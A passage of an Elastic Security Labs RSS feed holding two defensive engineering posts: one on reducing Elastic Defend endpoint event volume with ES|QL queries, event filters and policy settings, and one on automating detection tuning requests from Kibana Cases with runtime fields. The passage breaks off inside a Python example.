            <link>https://www.elastic.co/kr/security-labs/how-elastic-infosec-optimizes-defend</link>
            <guid>how-elastic-infosec-optimizes-defend</guid>
            <pubDate>Tue, 27 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article details the internal Elastic Infosec team's process to optimize our endpoint data collection using Event Filtering and Advanced Policy Settings in Elastic Defend.]]></description>
<content:encoded><![CDATA[<p>In the world of Security Operations Centers (SOCs), data is valuable, but excessive data can be problematic. Collecting every single event from every endpoint is expensive, unnecessary, and can lead to performance issues on your workstations and clusters. At Elastic, we treat our own InfoSec team as &quot;Customer Zero&quot;: we run the latest versions of all Elastic products, which includes deploying Elastic Defend on our entire fleet of workstations, with all updates applied within 24 hours of a new version being released.</p>
<p>This article details the internal Elastic Infosec team's process to optimize our endpoint data collection. By leveraging <a href="https://www.elastic.co/kr/docs/solutions/security/manage-elastic-defend/event-filters">Event Filtering</a> and Advanced Policy Settings in <a href="https://www.elastic.co/kr/guide/en/security/current/install-endpoint.html"><strong>Elastic Defend</strong></a>, we significantly reduced noise, improved cluster performance, and saved on storage costs, all while maintaining a robust security posture. By following these strategies you can significantly reduce your EDR costs with only a few hours of work.</p>
<p>Elastic Defend is a powerful Endpoint Detection and Response agent that provides comprehensive protection against advanced threats. Elastic Defend offers a wide range of capabilities, including prevention, detection, and response, to safeguard your endpoints. In addition to on-host detections and alerting, its capabilities include rich event telemetry collected directly from the endpoint and sent to your Elastic stack, such as process executions, network connections, DNS events, USB Device Events, DLL and Driver loads, API events, file system changes, and registry modifications.
Elastic added default event filtering in 8.3.0+ that automatically filters out known benign system events unless you disable it in the policy's advanced settings. In addition to the built-in filters, it is easy to add your own custom <a href="https://www.elastic.co/kr/docs/solutions/security/manage-elastic-defend/event-filters">Event Filters</a> to Elastic Defend to reduce your costs even further.</p>
<h2>The environment: Worldwide Distributed Workforce</h2>
<p>Our environment at Elastic isn't like most traditional enterprises. We are a remote-first, distributed workforce with team members working in over 43 countries around the world. Almost half of our employees are developers or engineers who are constantly pushing the boundaries of what an operating system can do. They use Mac, Windows, and Linux workstations to compile software, build custom Linux kernels, run Elasticsearch clusters on Kubernetes on their workstations, and utilize complex development tools that can generate massive amounts of benign file and process activity.</p>
<p>When we initially rolled out Elastic Defend, our strategy was to first deploy to a small population of workstations from a variety of work centers, so we could get an idea of the event volume and filter out the noisiest events, and then gradually add more workstations each week. When we first installed Elastic Defend without any event filters, we saw a very large volume of data: an average of 48k events per hour per workstation. A large portion of these events was caused by benign but noisy management software such as Qualys, Jamf, and Intune. We needed a strategy to filter out the noise without creating blind spots for our security analysts.</p>
<h2>Step 1: Identifying the Noise</h2>
<p>When looking for noisy events there are generally two different categories of noise that you should look for:</p>
<ol>
<li>Software that is installed on the majority of your workstations.</li>
<li>A single host that is creating far more noise than your other hosts.</li>
</ol>
<p>When adding filters, start with the first category of noise, as that will make the bigger difference in the long run. A common cause of events like this is MDM agents or other applications that constantly repeat the same benign action, such as writing to a log file and making network connections to ship logs to the cluster.</p>
<p>When a single host is creating significantly more events than other hosts, it is often due to a misconfiguration or a bug; in these cases, the best solution is to fix the problem on the host. For example, we found a Linux system with a broken script that kept restarting and crashing thousands of times per second. Instead of adding an event filter, we reached out to the system owner, who fixed the script, which also improved the performance of the system. If the events are caused by software that isn't installed on other hosts, event filters scoped to individual hosts can be used. This will often be a single server, such as a database or web server, generating far more network or file events than other systems.</p>
<p>We use the following ES|QL queries to pinpoint high-volume event categories, processes, and file paths. If you are using an older version of Elastic that does not support ES|QL you can use Lens visualizations in a similar way.</p>
<p>In the following ES|QL queries we use the logs-endpoint.events* index pattern. This is the default index pattern created by Elastic Defend for storing streamed events from endpoints. If you are using a custom configuration or cross cluster search this index pattern may be different.</p>
<p><strong>Noisiest Event Categories and Actions:</strong> Use this query to find the categories and actions that are generating the most events. This is a good starting point, showing you where the noisiest events are and where filtering will have the biggest impact.</p>
<pre><code>FROM logs-endpoint.events*
| STATS event_count = count(*) BY event.category, event.action
| SORT event_count DESC
| LIMIT 10
| KEEP event.category, event.action, event_count
</code></pre>
<p><strong>10 Noisiest Hosts:</strong> This query is a good way to find your noisiest workstations or servers.</p>
<pre><code>FROM logs-endpoint.events*
| STATS event_count = count(*) BY host.id, host.name
| SORT event_count DESC
| LIMIT 10
| KEEP host.id, host.name, event_count
</code></pre>
<p><strong>Noisiest events on a single host:</strong> Once you've identified a noisy host, use this query to drill down and find the specific processes, command lines, or file paths driving that volume. You can add the <code>| WHERE host.id == &quot;{HOST_ID}&quot;</code> filter to any of the following queries to drill down into a single host's events.</p>
<pre><code>FROM logs-endpoint.events*
| WHERE host.id == &quot;{HOST_ID}&quot;
| STATS event_count = count(*) BY event.category, event.action, process.name, process.command_line, file.path
| SORT event_count DESC
| LIMIT 10
| KEEP process.name, process.command_line, event.category, event.action, file.path, event_count
</code></pre>
<p><strong>Noisiest Process Names:</strong> Use this query to find which applications or system processes are responsible for the highest event volume globally across your fleet.</p>
<pre><code>FROM logs-endpoint.events*
| STATS event_count = count(*) BY process.name
| SORT event_count DESC
| LIMIT 10
| KEEP process.name, event_count
</code></pre>
<p><strong>Noisiest File Paths:</strong> Use this query to identify specific files or directories that are being accessed or modified frequently, often indicating logging or temporary file activity.</p>
<pre><code>FROM logs-endpoint.events*
| WHERE event.category == &quot;file&quot;
| STATS event_count = count(*) BY file.path, event.action
| SORT event_count DESC
| LIMIT 10
| KEEP file.path, event.action, event_count
</code></pre>
<p><strong>Top 10 Network Events by Process Name:</strong> Use this query to see which processes are generating the most network connection events, which can help identify chatty agents or services.</p>
<pre><code>FROM logs-endpoint.events*
| WHERE event.category == &quot;network&quot;
| STATS event_count = count(*) BY process.name
| SORT event_count DESC
| LIMIT 10
| KEEP process.name, event_count
</code></pre>
<p><strong>Top 10 Process Names by File Events:</strong> Use this query to identify which processes are generating the most file system noise, distinguishing them from other categories like network or registry events.</p>
<pre><code>FROM logs-endpoint.events*
| WHERE event.category == &quot;file&quot;
| STATS event_count = count(*) BY process.name
| SORT event_count DESC
| LIMIT 10
| KEEP process.name, event_count
</code></pre>
<h2>Step 2: Precise Event Filtering</h2>
<p>Armed with this data, we utilize <a href="https://www.elastic.co/kr/docs/solutions/security/manage-elastic-defend/event-filters"><strong>Event Filters</strong></a> in Elastic Defend. This feature prevents specific events from ever being sent to Elasticsearch, filtering them out directly at the endpoint. Filtering these events has no impact on the malware and host protections provided by Elastic Defend; it only stops these events from being sent to your cluster. This saves network bandwidth, disk storage, and CPU cycles on the workstations and ingest pipelines.</p>
<h3>Filter example 1: Elasticsearch file noise</h3>
<p>At Elastic we have a lot of users who run their own installations of Elasticsearch on their workstations for testing or development. Elasticsearch writes files to disk very often as documents are ingested, which can be quite noisy. Each filter is OS-specific, so you may need to create more than one version of some filters; this is the macOS version of this event filter:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/how-elastic-infosec-optimizes-defend/image3.png" alt="" /></p>
<h3>Filter example 2: Linux Logfile modifications</h3>
<p>On Linux systems log files are being constantly updated. This filter can be used to exclude all modification events when the <code>file.extension</code> is <code>log</code>. We would still receive events if a log file is created or deleted, but not when it is modified.</p>
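<p>Before deploying a filter like this, you can estimate how many events it would suppress by mirroring its conditions in an ES|QL query. The <code>event.action</code> value here assumes Elastic Defend's file modification events:</p>
<pre><code>FROM logs-endpoint.events*
| WHERE event.category == &quot;file&quot; AND event.action == &quot;modification&quot; AND file.extension == &quot;log&quot;
| STATS event_count = count(*) BY host.os.type
| SORT event_count DESC
</code></pre>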
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/how-elastic-infosec-optimizes-defend/image1.png" alt="" /></p>
<h3>Filter example 3: Docker running ps</h3>
<p>On macOS systems that have Docker installed, the Docker backend process runs <code>ps</code> regularly to get information about the containers running on the workstation. Across our fleet of workstations we were seeing these events over 153 million times per month. This filter can be used to exclude those events from collection.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/how-elastic-infosec-optimizes-defend/image2.png" alt="" /></p>
<p><strong>Pro Tip:</strong> When applying filters, use the &quot;Comments&quot; field in the UI to document <em>why</em> a filter exists and link to the relevant ticket or investigation. This is crucial for long-term maintenance.</p>
<h2>Step 3: Optimizing Performance at the Source</h2>
<p>Beyond filtering, it is possible to make changes to the advanced settings of an Elastic Defend policy that will reduce the size of every event that is ingested. These advanced settings can reduce the number of events generated without sacrificing security. There are <a href="https://www.elastic.co/kr/docs/solutions/security/configure-elastic-defend/configure-data-volume-for-elastic-endpoint">several features</a> that help reduce the amount of data created by Elastic Agent.</p>
<p>Elastic Defend calculates MD5, SHA-1, and SHA-256 hashes for file events and alerts. Prior to 8.18 collecting all three hashes was enabled by default, but in 8.18 and newer the MD5 and SHA-1 hashes are disabled by default. These calculations consume workstation CPU cycles and cluster storage space calculating hashes that are unnecessary when we have the SHA-256 values.</p>
<p>If you are running Elastic Agent prior to 8.18 and want to disable these hash calculations, this is how to disable MD5 and SHA-1 collection in the integration policy settings:</p>
<ol>
<li>Navigate to <strong>Integration Policies</strong> -&gt; <strong>Elastic Defend</strong>.</li>
<li>Click <a href="https://www.elastic.co/kr/docs/reference/security/defend-advanced-settings"><strong>Show advanced settings</strong></a>.</li>
<li>Under <strong>Windows/macOS/Linux event settings</strong>, set these values to <code>false</code>:
<ul>
<li><code>windows.advanced.events.hash.md5</code></li>
<li><code>windows.advanced.events.hash.sha1</code></li>
<li><code>linux.advanced.events.hash.md5</code></li>
<li><code>linux.advanced.events.hash.sha1</code></li>
<li><code>macos.advanced.events.hash.md5</code></li>
<li><code>macos.advanced.events.hash.sha1</code></li>
</ul>
</li>
</ol>
<h3>Event Aggregation</h3>
<p>Another effective way to reduce data volume is event aggregation. Elastic Defend automatically merges short-lived process and network events with the same values into a single event document. Without this setting, every process would create three separate <code>start</code>, <code>fork</code>, and <code>end</code> events. With it enabled, these three events are combined into a single document if they happen within a few seconds of each other.</p>
<p>This is particularly useful for environments where processes spin up and shut down rapidly. This feature is enabled by default on 8.18 and newer versions of Elastic Defend, but it can be enabled on older versions using the advanced settings. You can control this behavior using the <a href="https://www.elastic.co/kr/docs/reference/security/defend-advanced-settings"><strong>advanced setting</strong></a> <code>[linux|mac|windows].advanced.events.aggregate_process</code>. We found that keeping these enabled significantly reduced our event count without impacting our ability to investigate incidents.</p>
<p><strong>The Impact:</strong></p>
<ul>
<li><strong>Reduced CPU Usage:</strong> The agent no longer spends cycles calculating three different hashes for every file event.</li>
<li><strong>Smaller Event Size:</strong> Removing these fields slightly reduced the size of every file event JSON document sent to Elasticsearch, compounding into significant storage savings over billions of events.</li>
</ul>
<h2>Results</h2>
<p>By implementing these changes, we transformed our detection environment:</p>
<ul>
<li><strong>Volume Reduction:</strong> We dropped from an average of ~48k events per host per hour to ~12k events per host per hour—a 75% reduction in noise.</li>
<li><strong>Cost Savings:</strong> Assuming an average size of 1kb per document ingested, reducing event volume by 36,000 documents per host per hour translates to a reduction of ingested logs by 3.5TB per day for our fleet of 4,000 hosts. This results in an estimated reduction of around 100TB per month in our Elastic cluster, saving our team thousands of dollars every month. The true savings amount can vary depending on your settings such as <a href="https://www.elastic.co/kr/guide/en/elasticsearch/reference/current/getting-started-index-lifecycle-management.html">ILM</a>, <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/using-logsdb-index-mode-with-elastic-security">logsdb</a>, <a href="https://www.elastic.co/kr/docs/manage-data/lifecycle/data-tiers#frozen-tier">frozen storage</a>, network transfer costs, cloud provider costs, and the hardware used in your cluster.</li>
<li><strong>Improved Signal:</strong> Our analysts now see fewer benign events which improves overall search speed and makes it easier to find the signal in the noise when hunting for threats.</li>
</ul>
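<p>As a sanity check, the storage estimate above can be reproduced with a quick ES|QL <code>ROW</code> computation, assuming 1 KiB per document across 4,000 hosts:</p>
<pre><code>ROW hosts = 4000, saved_per_host_hour = 36000, bytes_per_event = 1024
| EVAL bytes_per_day = TO_LONG(hosts) * saved_per_host_hour * bytes_per_event * 24
| EVAL tb_per_day = bytes_per_day / 1000000000000.0
| KEEP tb_per_day
</code></pre>
<p>This returns roughly 3.5, matching the ~3.5TB-per-day figure above.</p>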
<h2>Conclusion</h2>
<p>Automation and configuration tuning are powerful tools for any SOC, and they are essential for managing the rich telemetry provided by modern endpoint security solutions like Elastic Defend. Don't be intimidated by the volume of events collected; this visibility is your greatest asset in detecting advanced threats. By treating our internal security team as Customer Zero, we proved that you can aggressively filter noise and optimize configurations to save money and improve performance without compromising security. These changes not only reduced our storage footprint but also empowered our analysts to focus on what matters most: detecting and responding to real threats.</p>
<p>We encourage you to embrace the full capabilities of Elastic Defend and take control of your endpoint data. Start by using <strong>ES|QL and Lens</strong> to identify your noisiest events, implement <strong>Event Filters</strong> to suppress benign activity, and review your <strong>Policy Settings</strong> to ensure you're only collecting the data you truly need. Ready to optimize your own environment? <a href="https://cloud.elastic.co/registration">Start your free trial</a> of Elastic Security today and experience the power of comprehensive endpoint protection.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/how-elastic-infosec-optimizes-defend/Security Labs Images 5.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Automating detection tuning requests with Kibana cases]]></title>
            <link>https://www.elastic.co/kr/security-labs/automating-detection-tuning-requests-with-kibana-cases</link>
            <guid>automating-detection-tuning-requests-with-kibana-cases</guid>
            <pubDate>Fri, 05 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how to automate detection rule tuning requests in Elastic Security. This guide shows how to add custom fields to Cases, create a rule to detect tuning needs, and use a webhook to create a frictionless feedback loop between analysts and detection engineers.]]></description>
            <content:encoded><![CDATA[<h2>Automating Detection Tuning Requests with Elastic Security</h2>
<p>At Elastic, the Infosec team is &quot;Customer Zero&quot;. We use the newest version of Elastic products extensively to secure our organization, which gives us unique insights into how to solve real-world security challenges. One of the ways we've improved Security Operations Center (SOC) efficiency is by creating a seamless, automated workflow that allows our analysts to open a detection tuning request directly from <a href="https://www.elastic.co/kr/docs/solutions/security/investigate/open-manage-cases">Kibana Cases</a> with a single click.</p>
<p>In any SOC, the feedback loop between security analysts and detection engineers is crucial for maintaining a healthy and effective security posture. Analysts on the front lines are the first to see how detection rules perform in the real world. They know which alerts are valuable, which are noisy, and which could be improved with a bit of tuning. Alert fatigue from noisy alerts increases the risk of missing a true positive, so quickly tuning out false positives is critical to responding to <em>true</em> positives. Capturing this alert feedback efficiently can be a challenge: manual processes like sending emails, opening tickets, or direct messages can be inconsistent, time-consuming, and hard to track.</p>
<p>With Elastic Security, an analyst can <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/add-detection-alerts-to-cases">attach alerts to a new or existing case</a> in Kibana, conduct their investigation, and with some customization and automation they can initiate a tuning request with a single click directly from <a href="https://www.elastic.co/kr/docs/solutions/security/investigate/open-manage-cases">Kibana Cases</a>. This article will walk you through how we built this automation, and how you can implement a similar system to close the feedback loop and optimize your detection and response program.</p>
<h2>Custom Fields in Kibana Cases</h2>
<p><a href="https://www.elastic.co/kr/docs/solutions/security/investigate/configure-case-settings#cases-ui-custom-fields">Custom fields</a> are a key component of this automation within the <a href="https://www.elastic.co/kr/docs/solutions/security/investigate/open-manage-cases">Kibana Cases</a>. Using these custom fields, we can capture the necessary information directly from the tool that the analysts are already using. These custom fields will appear on all new and existing cases, providing a clear and consistent way for analysts to flag a detection for review.</p>
<p>Note: The ability to add custom fields to cases was introduced in version 8.15. For more details, refer to the <a href="https://www.elastic.co/kr/docs/solutions/security/investigate/configure-case-settings#cases-ui-custom-fields">official Cases documentation</a>.</p>
<p>Every Kibana Case is a document stored in a dedicated Elasticsearch index: <code>.kibana_alerting_cases</code>. This means all your case data is available for querying, aggregation, and automation, just like any other data source in Elastic. Each case document contains a wealth of information, but a few fields are particularly useful for metrics and automation. The <code>cases.status</code> field tracks whether a case is open, in-progress, or closed, while <code>cases.created_at</code> and <code>cases.updated_at</code> provide timestamps crucial for calculating metrics like Mean Time to Resolution (MTTR). Fields like <code>cases.severity</code> and <code>cases.owner</code> allow you to slice and dice your metrics to see how the team is performing. Most importantly for this blog, the <code>cases.custom_fields</code> object contains an array of the custom fields you've configured. Runtime fields can be used to parse the array of custom fields, allowing you to build queries, dashboards, visualizations, and detection rules that trigger workflows.</p>
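<p>As a rough illustration of the kind of metric this enables, here is a minimal Python sketch of computing MTTR from case documents. The field names follow the post; treating <code>cases.updated_at</code> of a closed case as its resolution time is an approximation, and the documents below are toy data:</p>

```python
# Sketch: a rough MTTR calculation over case documents.
# Field names follow the post (cases.created_at / cases.updated_at);
# using updated_at as the close time of a closed case is an approximation.
from datetime import datetime

cases = [  # toy documents standing in for .kibana_alerting_cases hits
    {"status": "closed", "created_at": "2025-12-01T10:00:00Z", "updated_at": "2025-12-01T12:30:00Z"},
    {"status": "closed", "created_at": "2025-12-02T09:00:00Z", "updated_at": "2025-12-02T09:45:00Z"},
    {"status": "open",   "created_at": "2025-12-03T08:00:00Z", "updated_at": "2025-12-03T08:05:00Z"},
]

def parse(ts):
    # fromisoformat does not accept a trailing "Z" on older Pythons
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))

closed = [c for c in cases if c["status"] == "closed"]
hours = [(parse(c["updated_at"]) - parse(c["created_at"])).total_seconds() / 3600 for c in closed]
mttr_hours = sum(hours) / len(hours)
print(round(mttr_hours, 3))  # mean time to resolution in hours
```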
<p>Beyond tuning requests, custom fields are incredibly versatile for tracking metrics and enriching cases. For example, we have a &quot;<strong>Complex Case</strong>&quot; custom field to flag cases that take more than an hour to resolve, helping us identify rules that may need better investigation guides or automation to help reduce the investigation time. We also use custom fields like <strong>&quot;Detection rule valid&quot;</strong> and <strong>&quot;True Positive Alert&quot;</strong> to gather granular feedback on rule performance and fidelity, allowing us to build powerful dashboards in Kibana to visualize the operational effectiveness of our SOC.</p>
<p>To use runtime fields and data visualizations with your cases, you first need to create a data view for the Cases index.</p>
<p><strong>Navigate to Data Views:</strong> In Kibana, go to Stack Management &gt; Data Views and click ‘Create data view’.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/image4.png" alt="" /></p>
<p>Configure the Data view to map the <code>.kibana_alerting_cases</code> system index. You will need to click the <strong>Allow hidden and system indices</strong> button to allow this. For the timestamp field I recommend using the <code>cases.updated_at</code> field so the cases are displayed by the most recent activity.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/image3.png" alt="" /></p>
<h2>Creating Custom fields</h2>
<p>There are two types of custom fields: <code>Text</code> fields for free-form input and <code>Toggle</code> fields for simple yes/no feedback. For our tuning request automation, we use one of each. The text field is an optional field used to capture any additional feedback from the analyst, and the toggle field is used to trigger the automation.</p>
<p>In Kibana, go to Security &gt; Cases, then click on <strong>Settings</strong> in the top right. In the settings page you will see a <strong>Custom Fields</strong> section where you can add the new fields you want. The fields are displayed in the cases UI in alphabetical order so we prefix our fields with numbers to keep them in the order we want.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/image5.png" alt="" /></p>
<p>Now you can create the new custom fields. The labels added in the UI are only shown to analysts and are not stored in the cases index, so they can be any value you want.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/image1.png" alt="" /></p>
<p><strong>Add Custom Fields:</strong> We need two fields for this workflow.</p>
<ul>
<li>
<p><strong>Field 1:</strong> Tuning Required Toggle</p>
<ul>
<li>This will be the button analysts click to initiate a tuning request.</li>
<li><strong>Label:</strong> <code>Open tuning request?</code></li>
<li><strong>Type:</strong> Toggle</li>
<li><strong>Default Value:</strong> Off</li>
</ul>
</li>
<li>
<p><strong>Field 2:</strong> Tuning Request Details</p>
<ul>
<li>This field allows the analyst to provide specific details about what needs to be changed, such as adding an exception, lowering the severity, or adjusting the query logic.</li>
<li><strong>Label:</strong> <code>Tuning request detail</code></li>
<li><strong>Type:</strong> Text</li>
</ul>
</li>
</ul>
<h2>Using Runtime fields to map the custom fields</h2>
<p>A challenge when working with custom fields in Kibana Cases is that the <code>cases.custom_fields</code> field is mapped as an array of objects, where each object represents a custom field with its name and value. This structure makes it difficult to query for specific custom fields directly in KQL. For example, you can't simply use a query like <code>cases.custom_fields.open_tuning_request : &quot;true&quot;</code>. To overcome this, we can use <a href="https://www.elastic.co/kr/docs/manage-data/data-store/mapping/runtime-fields">runtime fields</a> to parse and query the custom fields.</p>
<p>Runtime fields are fields that are evaluated at query time. They allow you to create new fields on the fly without having to reindex your data. We can define runtime fields on the <code>.kibana_alerting_cases</code> index to use a painless script to parse the <code>cases.custom_fields</code> array and extract the values we need into new, easily queryable fields.</p>
<p>For this workflow, we'll create two runtime fields that will map to the custom fields created above:</p>
<ul>
<li><code>TuningRequired</code>: A boolean field that will be <code>true</code> if the &quot;Open tuning request&quot; toggle is on.</li>
<li><code>TuningDetail</code>: A text field that will contain the analyst's comments from the &quot;Tuning request detail&quot; field.</li>
</ul>
<p>Before we can create the runtime fields, we first need to identify the unique ID (<code>key</code>) that Kibana assigns to each custom field. Currently, there isn't a straightforward way to view this ID in the UI. To find it, we used the following workaround:</p>
<ol>
<li><strong>Create the Fields.</strong> If you are using other custom fields you should create the custom fields one at a time to make it easier to identify the new field keys. If you only have the two fields mentioned above you can tell them apart using the <code>type</code> value which can be either text or toggle.</li>
<li><strong>Create a new case.</strong> After adding the field, we created a test case in Kibana and added some data to the description field and toggled the tuning required field to true with all other custom fields set to false or blank.</li>
<li><strong>Inspect the case document.</strong> We then navigated to Discover and queried the <code>.kibana_alerting_cases</code> index to find the document for the new case. By inspecting the <code>cases.customFields</code> array in the document's source, we could find the <code>key</code> associated with our new custom field. Save the values of the <code>key</code> fields to be used in the runtime scripts.</li>
</ol>
<p>The <code>cases.customFields</code> data is formatted like this:</p>
<pre><code class="language-yaml">  [
    {
      &quot;key&quot;: &quot;4537b921-3ca4-4ff0-aa39-02dd6a3177bd&quot;,
      &quot;type&quot;: &quot;text&quot;,
      &quot;value&quot;: &quot;This alert is too noisy&quot;
    },
    {
      &quot;key&quot;: &quot;cdf28896-c793-43d2-9384-99562e23a646&quot;,
      &quot;type&quot;: &quot;toggle&quot;,
      &quot;value&quot;: true
    }
  ]
</code></pre>
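<p>Outside of Painless, the lookup the runtime fields perform is just a scan of that array for a matching <code>key</code>. A minimal Python sketch using the example values above:</p>

```python
# Extract a custom field's value by its key, mirroring the runtime
# field logic: scan the array, return the first matching non-null value.
custom_fields = [
    {"key": "4537b921-3ca4-4ff0-aa39-02dd6a3177bd", "type": "text", "value": "This alert is too noisy"},
    {"key": "cdf28896-c793-43d2-9384-99562e23a646", "type": "toggle", "value": True},
]

def get_custom_field(fields, key):
    for cf in fields:
        if cf.get("key") == key and cf.get("value") is not None:
            return cf["value"]
    return None  # field absent or never set

print(get_custom_field(custom_fields, "cdf28896-c793-43d2-9384-99562e23a646"))  # True
```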
<h3>Creating the Runtime Fields</h3>
<p>You can add runtime fields through the Kibana UI or by using the Elasticsearch API in the Dev Tools console. If you have not already created a data view for the Cases information you will need to do that first.</p>
<p>While viewing the new Kibana Cases Data view click the ‘Add Field’ button to open the flyout menu to create a new runtime field.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/image7.png" alt="" /></p>
<p>Enter the name of the field; in this example we are configuring <code>TuningRequired</code> as a new Boolean field type. Click the ‘Set Value’ toggle to configure this as a runtime field defined via a painless script. Update the painless script below to replace <code>TUNING_REQUIRED_FIELD_KEY_UUID</code> with the <code>key</code> value from the Tuning Required custom field, paste it into the value field, and save the new runtime field.</p>
<pre><code class="language-javascript">if (params._source.containsKey('cases') &amp;&amp;
    params._source.cases != null &amp;&amp;
    params._source.cases.containsKey('customFields') &amp;&amp;
    params._source.cases.customFields != null) {
  for (def cf : params._source.cases.customFields) {
    if (cf != null &amp;&amp;
        cf.containsKey('key') &amp;&amp;
        cf.key != null &amp;&amp;
        cf.key.contains('TUNING_REQUIRED_FIELD_KEY_UUID') &amp;&amp;
        cf.containsKey('value') &amp;&amp;
        cf.value != null) {
      emit(cf.value);
      break;
    }
  }
}
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/image6.png" alt="" /></p>
<p>Repeat this process for the <code>TuningDetail</code> field, remember to use the <code>key</code> value from the text field in this field’s painless script. If you have any additional custom fields in your cases that you want to use for dashboards or metrics you can map those as well with this same process.</p>
<p>If you control your cluster settings and data views ‘as code’ you can also add runtime fields to an index mapping using the <a href="https://www.elastic.co/kr/guide/en/elasticsearch/reference/current/indices-put-mapping.html">Update mapping API</a> from the Kibana Dev Tools console.</p>
<h2>Automating the tuning request creation</h2>
<p>We can trigger this automation in two ways: through a custom detection rule (that will create a new alert and send it to a connector when a case is updated with a tuning request) or via a scheduled external automation that queries the API.</p>
<p>This automation can be created using any automation platform such as Tines, GitHub Actions, or custom scripting. This is the logic we use for our automation:</p>
<h3>Step 1: Find any cases recently tagged as <code>TuningRequired</code></h3>
<p>You can use the following Elasticsearch query to find all case documents in the <code>.kibana_alerting_cases</code> index that have been updated within the last hour (based on the <code>cases.updated_at</code> field) where the <code>TuningRequired</code> field has been set to <code>true</code>. Note that the runtime field mappings must be included in the API request in order to query the custom fields.</p>
<pre><code class="language-yaml">POST /.kibana_alerting_cases/_search  
{  
  &quot;query&quot;: {  
    &quot;bool&quot;: {  
      &quot;must&quot;: [],  
      &quot;filter&quot;: [  
        {  
          &quot;bool&quot;: {  
            &quot;should&quot;: [  
              {  
                &quot;match&quot;: {  
                  &quot;TuningRequired&quot;: true  
                }  
              }  
            ],  
            &quot;minimum_should_match&quot;: 1  
          }  
        },  
        {  
          &quot;range&quot;: {  
            &quot;cases.updated_at&quot;: {  
              &quot;format&quot;: &quot;strict_date_optional_time&quot;,  
              &quot;gte&quot;: &quot;now-1h&quot;,  
              &quot;lte&quot;: &quot;now&quot;  
            }  
          }  
        }  
      ],  
      &quot;should&quot;: [],  
      &quot;must_not&quot;: []  
    }  
  },  
 &quot;runtime_mappings&quot;: {  
   &quot;TuningDetail&quot;: {  
     &quot;type&quot;: &quot;keyword&quot;,  
     &quot;script&quot;: {  
       &quot;source&quot;: &quot;if (\nparams._source.containsKey('cases') &amp;&amp;\nparams._source.cases != null &amp;&amp;\nparams._source.cases.containsKey('customFields') &amp;&amp;\nparams._source.cases.customFields != null\n) {\nfor (def cf : params._source.cases.customFields) {\nif (\ncf != null &amp;&amp;\ncf.containsKey('key') &amp;&amp;\ncf.key != null &amp;&amp;\ncf.key.contains('6cadc70a-7d68-4531-9861-7d5bc24c4c1c') &amp;&amp;\ncf.containsKey('value') &amp;&amp;\ncf.value != null\n) {\nemit(cf.value);\nbreak;\n}\n}\n}&quot;  
     }  
   },  
   &quot;TuningRequired&quot;: {  
     &quot;type&quot;: &quot;boolean&quot;,  
     &quot;script&quot;: {  
       &quot;source&quot;: &quot;if (\nparams._source.containsKey('cases') &amp;&amp;\nparams._source.cases != null &amp;&amp;\nparams._source.cases.containsKey('customFields') &amp;&amp;\nparams._source.cases.customFields != null\n) {\nfor (def cf : params._source.cases.customFields) {\nif (\ncf != null &amp;&amp;\ncf.containsKey('key') &amp;&amp;\ncf.key != null &amp;&amp;\ncf.key.contains('496e71f2-2bce-47a2-93a8-00db0de2d1b4') &amp;&amp;\ncf.containsKey('value') &amp;&amp;\ncf.value != null\n) {\nemit(cf.value);\nbreak;\n}\n}\n}&quot;  
     }  
   }  
 },  
  &quot;fields&quot;: [  
    &quot;TuningDetail&quot;,  
    &quot;TuningRequired&quot;  
  ]  
}
</code></pre>
<p>Any time a field is changed or a comment is added, the case's <code>updated_at</code> field is set to the current time. This means a single case can be returned multiple times by this automation if it runs regularly while the case is being updated, so any automation process leveraged here should deduplicate cases to avoid processing the same case more than once.</p>
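<p>One simple way to do that deduplication, sketched in Python with an in-memory set standing in for whatever persistent state store your automation platform provides:</p>

```python
# Sketch: deduplicating cases across hourly automation runs.
# 'seen' would be persisted (a file, KV store, etc.) in a real pipeline.
def new_cases(hits, seen):
    fresh = []
    for hit in hits:
        case_id = hit["_id"]  # e.g. "cases:a1"
        if case_id not in seen:
            seen.add(case_id)
            fresh.append(hit)
    return fresh

seen = set()
run1 = new_cases([{"_id": "cases:a1"}, {"_id": "cases:b2"}], seen)
run2 = new_cases([{"_id": "cases:b2"}, {"_id": "cases:c3"}], seen)  # b2 already handled
print([h["_id"] for h in run2])  # ['cases:c3']
```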
<h3>Step 2: Parsing each case</h3>
<p>Loop through each of the cases returned by the previous query to process them one at a time. Each document returned will contain the <code>fields</code> array with the values from the custom fields, as well as other useful fields. Parse each of the following fields and store them for future use:</p>
<ul>
<li>The <code>_id</code> field will have a format like <code>cases:{{case_ID}}</code>. The case ID is used for future API requests in the automation to add comments to the case or retrieve all alerts attached to the case.</li>
<li><code>cases.title</code> is the title of the case.</li>
<li><code>cases.assignees</code> is who the case is assigned to.</li>
<li><code>cases.updated_by</code> is the last person to update the case; this is often the person submitting the tuning request and can be useful for knowing who to contact for more information.</li>
<li><code>cases.tags</code> can be useful if you are using tags to sort or identify your cases.</li>
</ul>
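<p>Putting that together, a search hit can be reduced to a compact tuning-request record. A minimal Python sketch (every value below is illustrative, not real case data):</p>

```python
# Sketch: extracting the useful fields from a single case search hit.
hit = {
    "_id": "cases:4a8b2c1d-0f3e-4b5a-9c6d-7e8f9a0b1c2d",  # hypothetical ID
    "_source": {
        "cases": {
            "title": "Suspicious PowerShell on host-42",
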